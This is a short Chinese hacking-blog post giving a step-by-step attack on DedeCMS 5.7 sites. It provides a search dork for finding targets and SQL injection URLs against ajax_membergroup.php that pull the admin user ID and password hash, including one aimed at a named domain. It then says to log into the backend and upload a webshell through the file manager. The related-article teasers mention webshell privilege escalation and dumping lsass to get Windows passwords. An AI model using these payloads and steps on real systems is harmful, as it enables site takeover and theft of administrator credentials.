dedecms 版本漏洞

hacker5年前黑客文章1026

织网5.7的漏洞,可任意上传~

搜索关键词:Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc

访问/data/admin/ver.txt来查看cms

然后访问/member/ajax_membergroup.php?action=post&membergroup=1,出现"朋友 修改"即可注入

通过注入得到管理员帐号密码,搜后台,上传大马OK~提权还在学习阶段~

1

查看网站的版本

code 区域
cms /data/admin/ver.txt

2

查看是否有"朋友 修改",有则存在注入


code 区域
/member/ajax_membergroup.php?action=post&membergroup=1

3

帐号

code 区域
http://www.dzdyk.com /member/ajax_membergroup.php?action=post&membergroup=@`'` Union select userid from `%23@__admin` where 1 or id=@`'`

4

去掉前三位和最后一位,得到管理员密码

code 区域
/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select pwd from `%23@__admin` where 1 or id=@`'`

5

扫后台,登录成功

6

后台页面

7

模块-文件管理器-文件上传 上传大马

8

登录webshell

标签: 黑客技术

相关文章

Fiddler爬取手机端机器设备的数据文件

Fiddler爬取手机端机器设备的数据文件

要想Fiddler爬取手机端机器设备的数据文件,其实不是很难,先而言说移动终端如何去浏览互联网?看过下边这幅图,就懂了。   能够看得出来,挪动端数据文件,全是要走wifi出来,因此我们...

详解webshell提权服务器的21种方法

详解webshell提权服务器的21种方法

详解webshell提权服务器的21种方法 1.radmin连接法   条件是你权限够大,对方连防火墙也没有。封装个radmin上去,运行,开对方端口,然后radmin上去...

黑客技术

不知道你有没掌握什么电脑专业知识先多学学黑客的一般术语本人也想学黑客技术的经常看看黑客们制作的动画在这里给你复制他人的劳动成果希望对你有。 黑客,对于一些刚刚接触网络的人来说,是神秘的代言词。加之电视...

绕过杀毒软件抓取windows密码

 使用procdump,由于是微软的东西,带微软签名杀软不会报毒。 procdump -accepteula -ma lsass.exe lsass.dmp copy出 ls...

Retina的典型性主要用途是啥?

Retina的典型性主要用途是啥?

什么叫Retina? Retina是安全性制造行业最受尊重和业内认证的漏洞检测程序流程之一,是大家的漏洞管理解决方法的模块。沒有更强的挑选来维护您的互联网免遭系统漏洞的进攻。   Reti...

电脑操作系统检验Nmap使用方法

电脑操作系统检验Nmap使用方法

Nmap是一款网络扫描和服务器检验的十分有效的专用工具。 Nmap不是限于只是搜集信息内容和枚举类型,另外能够用于做为一个系统漏洞探测仪或安全性扫描枪。它能够适用winodws,linux,mac等...